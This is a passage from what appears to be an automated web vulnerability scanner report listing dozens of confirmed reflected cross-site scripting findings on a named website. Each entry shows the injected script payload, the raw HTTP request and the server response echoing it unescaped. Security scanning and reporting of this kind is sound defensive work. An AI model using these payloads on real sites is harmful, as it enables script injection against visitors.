http://www.shalomlaam.co.il/js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)..
Parameters
Request
GET /js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003C2)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:25 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/top1.htm'"--></style></script><script>netsparker(0x0003C2)</script><BR>script><BR>style><<script>netsparker(0x0003C2)<.asp?id=script>
62 / 146
3.89. /scripts/swfobject.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(..
Parameters
<script>alert(0x0000FF)</script>
Request
GET /scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FF)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:08 GMT
Content-Length: 180
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/scripts/swfobject.js'"--></style></script><script>netsparker(0x0000FF)</script><BR>script><BR>style><<script>netsparker(0x0000FF)<.asp?id=script>
3.90. /jAccordion/jquery.jAccordion-1.2.1.min.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script..
Parameters
Request
GET /jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F9)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:06 GMT
Content-Length: 201
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/jAccordion/jquery.jAccordion-1.2.1.min.js'"--></style></script><script>netsparker(0x0000F9)</script><BR>script><BR>style><<script>netsparker(0x0000F9)
<.asp?id=script>
63 / 146
3.91. /about/reg/maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/about/reg/maillingUpdate.asp?'"--></style></script><script>alert(0x00052..
Parameters
Request
POST /about/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000526)</script> HTTP/1.1
Content-Length: 37
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:07 GMT
Content-Length: 189
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000526)</script><BR>script><BR>style><<script>netsparker(0x000526)<.asp?
id=script>
3.92. /alon/musag.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..
Parameters
Request
GET /alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:01 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/alon/musag.asp'"--></style></script><script>netsparker(0x000198)</script><BR>script><BR>style><<script>netsparker(0x000198)<.asp?id=script>
64 / 146
3.93. /site/about/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)..
Parameters
Request
GET /site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:06 GMT
Content-Encoding:
404;http://www.shalomlaam.co.il:80/site/about/'"--></style></script><script>netsparker(0x00028E)</script><BR>script><BR>style><<script>netsparker(0x00028E)<.asp?id=script>
3.94. /site/l/agrala_tozaot.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Request
GET /site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A5)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:25 GMT
Content-Length: 184
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/l/agrala_tozaot.asp'"--></style></script><script>netsparker(0x0002A5)</script><BR>script><BR>style><<script>netsparker(0x0002A5)<.asp?id=script>
65 / 146
3.95. /site/alon/list.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:26 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/alon/list.asp'"--></style></script><script>netsparker(0x000131)</script><BR>script><BR>style><<script>netsparker(0x000131)<.asp?id=script>
3.96. /sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/s..
Parameters
Request
GET /sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A0)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:07 GMT
Content-Length: 166
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/sipur/'"--></style></script><script>netsparker(0x0001A0)</script><BR>script><BR>style><<script>netsparker(0x0001A0)<.asp?id=script>
66 / 146
3.97. /site/reg/reg.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..
Parameters
Request
GET /site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:03 GMT
Content-Length: 176
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/reg/reg.asp'"--></style></script><script>netsparker(0x000288)</script><BR>script><BR>style><<script>netsparker(0x000288)<.asp?id=script>
3.98. /gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C..
Parameters
Request
GET /gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00014F)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:49 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gallery/'"--></style></script><script>netsparker(0x00014F)</script><BR>script><BR>style><<script>netsparker(0x00014F)<.asp?id=script>
3.99. /LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/sc..
Parameters
67 / 146
Request
GET /LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:04 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/LIVE/'"--></style></script><script>netsparker(0x00019D)</script><BR>script><BR>style><<script>netsparker(0x00019D)<.asp?id=script>
3.100. /site/pic/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3..
Parameters
Request
GET /site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00045E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:47 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/pic/'"--></style></script><script>netsparker(0x00045E)</script><BR>script><BR>style><<script>netsparker(0x00045E)<.asp?id=script>
3.101. /jAccordion/'%22--
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)..
Parameters
Request
GET /jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F2)%3C/script%3E HTTP/1.1
68 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:05 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/jAccordion/'"--></style></script><script>netsparker(0x0000F2)</script><BR>script><BR>style><<script>netsparker(0x0000F2)<.asp?id=script>
3.102. /search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
<script>alert(0x0001DA)</script>
Request
GET /search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DA)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:06 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/search/default.asp'"--></style></script><script>netsparker(0x0001DA)</script><BR>script><BR>style><<script>netsparker(0x0001DA)<.asp?id=script>
3.103. /gvideo/testimonialrotator/'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..
Parameters
Request
GET /gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000446)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:39 GMT
Content-Length: 186
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/testimonialrotator/'"--></style></script><script>netsparker(0x000446)</script><BR>script><BR>style><<script>netsparker(0x000446)<.asp?id=script>
69 / 146
3.104. /gvideo/js/'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%..
Parameters
Request
GET /gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000439)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:34 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/js/'"--></style></script><script>netsparker(0x000439)</script><BR>script><BR>style><<script>netsparker(0x000439)<.asp?id=script>
3.105. /etz_haim/'%22--
CONFIRMED
http://www.shalomlaam.co.il/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3..
Parameters
Request
GET /etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B2)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:25 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/etz_haim/'"--></style></script><script>netsparker(0x0001B2)</script><BR>script><BR>style><<script>netsparker(0x0001B2)<.asp?id=script>
70 / 146
3.106. /gvideo/js/swfobject.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Request
GET /gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00043D)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:35 GMT
Content-Length: 182
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/js/swfobject.js'"--></style></script><script>netsparker(0x00043D)</script><BR>script><BR>style><<script>netsparker(0x00043D)<.asp?id=script>
3.107. /snif.asp CONFIRMED
http://www.shalomlaam.co.il/snif.asp?'"--></style></script><script>alert(0x00023A)</script>
Parameters
id GET 61
Request
GET /snif.asp?'"--></style></script><script>netsparker(0x00023A)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:51 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/snif.asp?'"--></style></script><script>netsparker(0x00023A)</script><BR>script><BR>style><<script>netsparker(0x00023A)<.asp?id=script>
71 / 146
3.108. /js/AC_RunActiveContent.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
<script>alert(0x0000DF)</script>
Request
GET /js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DF)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:43:54 GMT
Content-Length: 185
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/AC_RunActiveContent.js'"--></style></script><script>netsparker(0x0000DF)</script><BR>script><BR>style><<script>netsparker(0x0000DF)<.asp?id=script>
3.109. /gallery/Default.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
id GET 0
Request
GET /gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026D)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/gallery/
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:55:28 GMT
Content-Encoding:
404;http://www.shalomlaam.co.il:80/gallery/Default.asp'"--></style></script><script>netsparker(0x00026D)</script><BR>script><BR>style><<script>netsparker(0x00026D)<.asp?id=script>
72 / 146
3.110. /site/reg/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3..
Parameters
Request
GET /site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00027E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:55:53 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/reg/'"--></style></script><script>netsparker(0x00027E)</script><BR>script><BR>style><<script>netsparker(0x00027E)<.asp?id=script>
3.111. /site/ask/ask_rabbi.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Request
GET /site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002D2)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:47 GMT
Content-Length: 182
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/ask/ask_rabbi.asp'"--></style></script><script>netsparker(0x0002D2)</script><BR>script><BR>style><<script>netsparker(0x0002D2)<.asp?id=script>
73 / 146
3.112. /about/reg/maillingUpdate.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..
Parameters
Request
POST /about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000522)%3C/script%3E HTTP/1.1
Content-Length: 37
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:05 GMT
Content-Length: 188
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x000522)</script><BR>script><BR>style><<script>netsparker(0x000522)<.asp?id=script>
3.113. /pages/page.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
id GET 96
Request
GET /pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021B)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:39 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/pages/page.asp'"--></style></script><script>netsparker(0x00021B)</script><BR>script><BR>style><<script>netsparker(0x00021B)<.asp?id=script>
74 / 146
3.114. /site/l/agrala_takanon.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
Request
GET /site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000393)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:07 GMT
Content-Length: 185
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/l/agrala_takanon.asp'"--></style></script><script>netsparker(0x000393)</script><BR>script><BR>style><<script>netsparker(0x000393)<.asp?id=script>
3.115. /Branches/'%22--
CONFIRMED
http://www.shalomlaam.co.il/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3..
Parameters
Request
GET /Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015B)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:55 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/Branches/'"--></style></script><script>netsparker(0x00015B)</script><BR>script><BR>style><<script>netsparker(0x00015B)<.asp?id=script>
75 / 146
3.116. /gvideo/testimonialrotator/testimonialrotator.css'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C..
Parameters
Request
GET /gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000455)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:44 GMT
Content-Length: 208
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/testimonialrotator/testimonialrotator.css'"--></style></script><script>netsparker(0x000455)</script><BR>script><BR>style>
<<script>netsparker(0x000455)<.asp?id=script>
3.117. /images/pagetop.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003E6)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:33 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/images/pagetop.asp'"--></style></script><script>netsparker(0x0003E6)</script><BR>script><BR>style><<script>netsparker(0x0003E6)<.asp?id=script>
76 / 146
3.118. /site/l/agrala_sheelot.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
Request
GET /site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000397)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:10 GMT
Content-Length: 185
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/l/agrala_sheelot.asp'"--></style></script><script>netsparker(0x000397)</script><BR>script><BR>style><<script>netsparker(0x000397)<.asp?id=script>
3.119. /ask/reg/maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/ask/reg/maillingUpdate.asp?'"--></style></script><script>alert(0x000643)..
Parameters
Request
POST /ask/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000643)</script> HTTP/1.1
Content-Length: 37
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:07:56 GMT
Content-Length: 187
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000643)</script><BR>script><BR>style><<script>netsparker(0x000643)<.asp?id=script>
77 / 146
3.120. /site/l/agrala_miadim.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Request
GET /site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00038E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:04 GMT
Content-Length: 184
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/l/agrala_miadim.asp'"--></style></script><script>netsparker(0x00038E)</script><BR>script><BR>style><<script>netsparker(0x00038E)<.asp?id=script>
3.121. /site/pitgam/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293..
Parameters
Request
GET /site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000293)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:09 GMT
Content-Encoding:
404;http://www.shalomlaam.co.il:80/site/pitgam/'"--></style></script><script>netsparker(0x000293)</script><BR>script><BR>style><<script>netsparker(0x000293)<.asp?id=script>
78 / 146
http://www.shalomlaam.co.il/ask/?cat='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005FC)%3..
Parameters
cat GET '"--></style></script>
<script>alert(0x0005FC)</script>
page GET 3
rabbi GET 3
tbl GET 3
Request
GET /ask/?cat='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FC)%3C/script%3E&page=3&rabbi=3&tbl=3 HTTP/1.1
Response
?CatID=0&page=4'></a>
</td>
<td valign="top" width="50">
<form name=form method=get target="_top">
<INPUT TYPE='hidden' NAME='tbl' value=''>
<INPUT TYPE='hidden' NAME='cat' value=''"--></style></script><script>netsparker(0x0005FC)</script>'>
<INPUT TYPE='hidden' NAME='rabbi' value='3'>
<select name='page' dir=rtl onChange='form.submit()'>
<script LANGUAGE="JavaScript">
for(var i=1;i<=23;i++){
if (i!=3){
document.w
3.123. /site/gallery/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F..
Parameters
Request
GET /site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F7)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:05 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/gallery/'"--></style></script><script>netsparker(0x0000F7)</script><BR>script><BR>style><<script>netsparker(0x0000F7)<.asp?id=script>
79 / 146
3.124. /ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/scr..
Parameters
Request
GET /ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000149)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:45 GMT
Content-Length: 164
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/'"--></style></script><script>netsparker(0x000149)</script><BR>script><BR>style><<script>netsparker(0x000149)<.asp?id=script>
3.125. /ask/reg/ CONFIRMED
http://www.shalomlaam.co.il/ask/reg/?'"--></style></script><script>alert(0x00062B)</script>
Parameters
Request
GET /ask/reg/?'"--></style></script><script>netsparker(0x00062B)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:07:42 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/reg/?'"--></style></script><script>netsparker(0x00062B)</script><BR>script><BR>style><<script>netsparker(0x00062B)<.asp?id=script>
3.126. /gvideo/style/'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044..
Parameters
80 / 146
Request
GET /gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00044E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:42 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/style/'"--></style></script><script>netsparker(0x00044E)</script><BR>script><BR>style><<script>netsparker(0x00044E)<.asp?id=script>
3.127. /tags/ CONFIRMED
http://www.shalomlaam.co.il/tags/?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C..
Parameters
q GET '"--></style></script>
<script>alert(0x0001BC)</script>
Request
GET /tags/?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E HTTP/1.1
Response
co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - - '"--></style></script><script>netsparker(0x0001BC)</script></title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords" content=',,,,,,,,,,,,,,,,,,
n="top">
<tr dir="rtl">
<td valign="top"><h1><span class="text_h1"><span class="koteret" dir="rtl"> ''''--></style></script><script>netsparker(0x0001BC)</script></span></span></h1>
<table width="560" border="0" align="left" cellpadding="0" cellspacing="0">
<tr><td><span style="font-weight:Normal; font-size:15px;"> 0 ''''--></style></script><script>netsparker(0x0001BC)</script></span></td></tr><tr><td height=25></td></tr>
<tr><td height="15"></td></tr>
<tr><td align="center"><a href="/tags/tags.asp" style="font-size:18px;"> </a></td></tr>
3.128. /contact/reg/ CONFIRMED

http://www.shalomlaam.co.il/contact/reg/?'"--></style></script><script>alert(0x000471)</script>
Parameters
Request
GET /contact/reg/?'"--></style></script><script>netsparker(0x000471)</script> HTTP/1.1
81 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:02:59 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/reg/?'"--></style></script><script>netsparker(0x000471)</script><BR>script><BR>style><<script>netsparker(0x000471)<.asp?id=script>
3.129. /js/delate_image.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
field GET picture_
<script>alert(0x0003CE)</script>
Request
GET /js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003CE)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:28 GMT
Content-Length: 179
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/delate_image.asp'"--></style></script><script>netsparker(0x0003CE)</script><BR>script><BR>style><<script>netsparker(0x0003CE)<.asp?id=script>
3.130. /ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/scri..
Parameters
Request
GET /ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017C)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:46:33 GMT
Content-Length: 163
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask'"--></style></script><script>netsparker(0x00017C)</script><BR>script><BR>style><<script>netsparker(0x00017C)<.asp?id=script>
82 / 146
3.131. /ask/ask_rabbi.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
Request
GET /ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000584)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:48 GMT
Content-Length: 177
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/ask_rabbi.asp'"--></style></script><script>netsparker(0x000584)</script><BR>script><BR>style><<script>netsparker(0x000584)<.asp?id=script>
3.132. /site/etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E
CONFIRMED
